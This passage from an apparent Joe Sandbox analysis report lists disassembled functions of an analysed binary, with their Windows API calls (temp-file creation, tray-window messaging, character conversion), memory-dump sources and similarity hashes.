                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                    • String ID: `5$h5
                                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-2563461917
                                                                                                                                                                                                                                                                                                    • Opcode ID: 445ab14e60bec0a9f237834026b7084dafa2b41d1467505c89cefafe7ee2eda1
                                                                                                                                                                                                                                                                                                    • Instruction ID: e25cc6006f5adbc902a3b7ee72557b35beecfb4490ff5e9cfdeb15594c249fa7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 445ab14e60bec0a9f237834026b7084dafa2b41d1467505c89cefafe7ee2eda1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DE08635905918DFC610D73CF84A9A837B4EBC5325F302175E616BB2929B342A46DA54
                                                                                                                                                                                                                                                                                                    Function 00E939D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00E939F0
                                                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00E93A05
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                                    • String ID: aut
                                                                                                                                                                                                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                                    • Opcode ID: 752e55bfaf1c7690cad3dea8d7b9aee1bd6064b14a9efb20d4932c7a8ec9346e
                                                                                                                                                                                                                                                                                                    • Instruction ID: f1809cbbba51a16b6ce5904190cf5725a8240849ef35be0b51b6b409502e5cb5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 752e55bfaf1c7690cad3dea8d7b9aee1bd6064b14a9efb20d4932c7a8ec9346e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6ED05B71504358ABDB2097559C0DFCB7A6CDB44710F0002A1BB95A10B1EAB0D549CB90
                                                                                                                                                                                                                                                                                                    Function 00EB2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EB2E08
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000), ref: 00EB2E0F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8F292: Sleep.KERNEL32 ref: 00E8F30A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                    • Opcode ID: 74ca7925f3d767b2626bd841e7e8262074b88eec14063bd3c84210bfbfb9fae4
                                                                                                                                                                                                                                                                                                    • Instruction ID: c1e67db6344b0a9dd20cd7e88881e80fad6aef15bd64fce0644b5553f0176655
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74ca7925f3d767b2626bd841e7e8262074b88eec14063bd3c84210bfbfb9fae4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43D0A93138A300BBE228B331AC0BFC36B549B04B00F100821B249BA0D0D8A068018654
                                                                                                                                                                                                                                                                                                    Function 00EB2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EB2DC8
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EB2DDB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8F292: Sleep.KERNEL32 ref: 00E8F30A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                    • Opcode ID: c7829bfbafedf1cd79c8f194d051bb3b1dd77a2a1f26adb73dfc58bb61e74634
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4c8ce5749265be82404a8119426c320db37470d7d9ec4dd1efd6ff3c308965f4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7829bfbafedf1cd79c8f194d051bb3b1dd77a2a1f26adb73dfc58bb61e74634
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AD0A935389300BBE228B331AC0BFD36B549B00B00F100821B249BA0D0D8A068018650
                                                                                                                                                                                                                                                                                                    Function 00E5C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00E5C213
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E5C221
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E5C27C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: e03ed64fe6b28dbcfcb881f0d1c81c9e21a42604456118ae4f7ae5bcd93c6a49
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0fc78b4289c1ca97b8dc5ca574bd170c5a346d3f768ed5343611fda31fd35690
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e03ed64fe6b28dbcfcb881f0d1c81c9e21a42604456118ae4f7ae5bcd93c6a49
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF410734604B05AFCB218FE5C854ABA7BE4EF0171AF345569EC55B71B1DB308C09C760